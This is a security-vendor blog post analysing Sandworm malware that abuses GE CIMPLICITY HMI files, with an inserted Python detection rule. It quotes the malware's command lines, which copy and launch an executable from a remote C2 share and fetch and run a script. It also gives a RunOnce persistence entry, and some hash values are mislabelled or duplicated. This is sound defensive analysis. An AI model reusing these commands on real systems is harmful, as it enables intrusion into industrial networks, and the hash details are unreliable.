Sandworm to Blacken: The SCADA Connection
On October 14th, a report was publicly released regarding the Sandworm team. After beginning an investigation into the affiliated malware samples and domains, we quickly came to the realization that this group is very likely targeting SCADA-centric victims who are using GE Intelligent Platform's CIMPLICITY HMI solution suite. We have observed this team utilizing .cim and .bcl files as attack vectors, both of which are file types used by the CIMPLICITY software. As further proof that the malware targets CIMPLICITY, it drops files into the CIMPLICITY installation directory using the %CIMPATH% environment variable on the victim machines.
Figure 1. Strings showing environment variable
CIMPLICITY is an application suite that is used in conjunction with SCADA systems. A key component of any SCADA system is the HMI. The HMI (which stands for Human-Machine Interface) can be viewed as an operator console that is used to monitor and control devices in an industrial environment. These devices can be responsible for automation control as well as safety operations.
Figure 2 below shows an example of where HMIs can be found in an electric power delivery system. Additionally, you may find HMIs in the corporate network that are being used for design, development, and testing.
Figure 2. Sample SCADA System
It is important to note that we are currently seeing CIMPLICITY being used as an attack vector; however, we have found no indication that this malware is manipulating any actual SCADA systems or data. Since HMIs are located in both the corporate and control networks, this attack could be used to target either network segment, or used to cross from the corporate to the control network.
What Drew Our Attention?
When looking closer at the recent Sandworm Team report, we started to pivot off several of the C2s that were identified in the report. Again, we aren't aware of any attacks against SCADA devices directly utilizing anything that we discuss below.
One of the C2s that drew our immediate attention was 94[.]185[.]85[.]122. We pivoted off this C2 and located a file called config.bak (SHA1 hash: c931be9cd2c0bd896ebe98c9304fea9e). This file piqued our interest right off the bat, because it is a CimEdit/CimView file. A CimEdit/CimView file is an object-oriented file for GE's Cimplicity SCADA software suite, used to administer SCADA devices.
Figure 3. CimView/CimEdit Example
In config.bak, there are two events that are defined: OnOpenExecCommand and ScreenOpenDispatch.
The handler of the OnOpenExecCommand is the following command line:
cmd.exe /c "copy \\94.185.85.122\public\default.txt "%CIMPATH%\CimCMSafegs.exe" && start "WOW64" "%CIMPATH%\CimCMSafegs.exe"
It’s important to note the variable %CIMPATH% for the drop location of default.txt. This is a standard variable that Cimplicity uses for its installs. The handler of ScreenOpenDispatch is the subroutine start(). The subroutine start() downloads the file from hxxp://94.185.85.122/newsfeed.xml, and saves it to {random 41 character hex string}.wsf, executes the downloaded file using cscript.exe, deletes the file after execution, and terminates the current process. We currently don’t have a sample of newsfeed.xml that can be analyzed for further detail.
This event mechanism does not seem to exploit vulnerabilities. It’s comparable to AutoOpen and AutoExec in MS Office. In addition to config.bak being a CimEdit/CimView file, there is a reference to devlist.cim, which is a Cimpack Design Drawing File.
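The event chain described above (an HMI process spawning cmd.exe to copy a binary from a UNC share into %CIMPATH% and start it, then cscript.exe running a 41-character hex-named .wsf) leaves a distinctive process-creation footprint. The following detection logic is an added example written for this post, not code from Trend Micro or from the malware; the parent process names CimView.exe/CimEdit.exe and the event records are assumptions constructed for illustration.

```python
import re

# Constructed process-creation events modelled on the CimEdit handlers described
# above (not real telemetry): parent image plus child command line.
SAMPLE_EVENTS = [
    {"parent": "CimView.exe",
     "cmdline": r'cmd.exe /c "copy \\94.185.85.122\public\default.txt "%CIMPATH%\CimCMSafegs.exe" '
                r'&& start "WOW64" "%CIMPATH%\CimCMSafegs.exe"'},
    {"parent": "CimView.exe",   # 41-character hex name, as the start() subroutine produces
     "cmdline": r"cscript.exe C:\Users\op\AppData\Local\Temp\0123456789abcdef0123456789abcdef012345678.wsf"},
    {"parent": "explorer.exe",  # benign local copy of a screen file, must not fire
     "cmdline": r"cmd.exe /c copy C:\Projects\plant.cim D:\backup\plant.cim"},
    {"parent": "CimView.exe",   # HMI spawning something other than cmd/cscript
     "cmdline": r"notepad.exe C:\Projects\devlist.cim"},
]

# Assumed HMI process names; CIMPLICITY screen files are opened by CimView/CimEdit.
HMI_PARENTS = {"cimview.exe", "cimedit.exe"}
# copy <UNC source> "%CIMPATH%\..."  : staging a remote binary into the install dir
UNC_TO_CIMPATH = re.compile(r'copy\s+\\\\\S+\s+"?%CIMPATH%', re.IGNORECASE)
# start ... %CIMPATH%\<name>.exe      : launching the staged binary
START_FROM_CIMPATH = re.compile(r"\bstart\b.*%CIMPATH%\\\S+\.exe", re.IGNORECASE)
# cscript running a .wsf whose base name is exactly 41 hex characters
HEX41_WSF = re.compile(r"(?:^|[\\/])[0-9a-f]{41}\.wsf\b", re.IGNORECASE)


def classify(event):
    """Return the rule names an event matches; an empty list means no finding."""
    hits = []
    parent = event["parent"].lower()
    cmd = event["cmdline"]
    if parent not in HMI_PARENTS:
        return hits
    child = cmd.split(None, 1)[0].lower()
    if child == "cmd.exe":
        if UNC_TO_CIMPATH.search(cmd):
            hits.append("hmi_copy_unc_to_cimpath")
        if START_FROM_CIMPATH.search(cmd):
            hits.append("hmi_start_exe_from_cimpath")
    elif child == "cscript.exe" and HEX41_WSF.search(cmd):
        hits.append("hmi_cscript_hex41_wsf")
    return hits


def scan(events):
    """Map each suspicious command line to the rules it matched."""
    return {e["cmdline"]: classify(e) for e in events if classify(e)}
```

Feeding real Sysmon or EDR process-creation records into `scan()` requires only mapping their parent-image and command-line fields onto the two keys used here.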
The default.txt file copied from the C2 in the above command structure drops and executes %Startup%\flashplayerapp.exe, then deletes itself after execution. Flashplayerapp.exe is capable of issuing the following commands:
- exec
- lexec
- die
- getup
- turnoff
- chprt
In addition to config.bak and default.txt being of interest, another file, shell.bcl (MD5: bdc7fafc26bee0e5e75b521a89b2746d), drew our attention. It is a script designed to run in the Basic Control Engine. .bcl files are used heavily throughout SCADA systems to automate certain functions. In Cimplicity, .bcl files are used for creating scripts to help automate functions. Shell.bcl executes \\94.185.85.122\public\xv.exe directly.
Based on the strings in shell.bcl, xv.exe is supposed to exploit a system vulnerability. We don’t currently have a copy or hash of xv.exe available to confirm this assumption.
Open Directories
During the course of regular threat intelligence gathering, we often look closer at the C2 server that attackers are using to communicate and drop/upload files to and from victim machines. In the case of 94[.]185[.]85[.]122, in addition to config.bak, we were able to pull down additional malware files that the particular actors were using from the C2. A few of the notable files found on the C2 can be found below. These files may or may not have been used in conjunction with attacks involving SCADA devices.
Spiskideputatovdone.ppsx (MD5 330e8d23ab82e8a0ca6d166755408eb1), whose name means "deputy list" in Russian, has been tied to the email address oleh.tiahnybok@vosvoboda.info based on VirusTotal submissions. It is a PPSX file that downloads/loads \\94[.]185[.]85[.]122\public\slide1.gif and \\94[.]185[.]85[.]122\public\slides.inf (MD5: d41d8cd98f00b204e9800998ecf8427e). The downloaded slides.inf renames the local slide1.gif to slide1.gif.exe and adds the registry entry HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce Install="{dir}\slide1.gif.exe". Oleh Tiahnybok is a Ukrainian politician with outspoken anti-Russian views.
Slide1.gif.exe (d41d8cd98f00b204e9800998ecf8427e) drops FONTCACHE.DAT (MD5:2f6582797bbc34e4df47ac25e363571d) and deletes itself after execution. In addition, FONTCACHE.DAT is a version of the Black Energy bot capable of executing the following commands against the system:
- delete
- ldplg
- unlplg
- update
- dexec
- exec
- updcfg
Conclusion
As we have seen, these are pieces of a very complex targeted attack that is seemingly focusing on GE Intelligent Platform CIMPLICITY users. We have, at present, found no indications that this malware is actually manipulating physical SCADA systems or their resultant data. As we continue the investigation into this targeted attack, be sure to check back as we will keep you up to date on our findings. All of the samples listed in this blog are currently caught by Trend Micro under the names BKDR_BLACKEN.A and BKDR_BLACKEN.B.
Special Thanks to the entire FTR Team and Christopher Daniel So
Post from: Trendlabs Security Intelligence Blog – by Trend Micro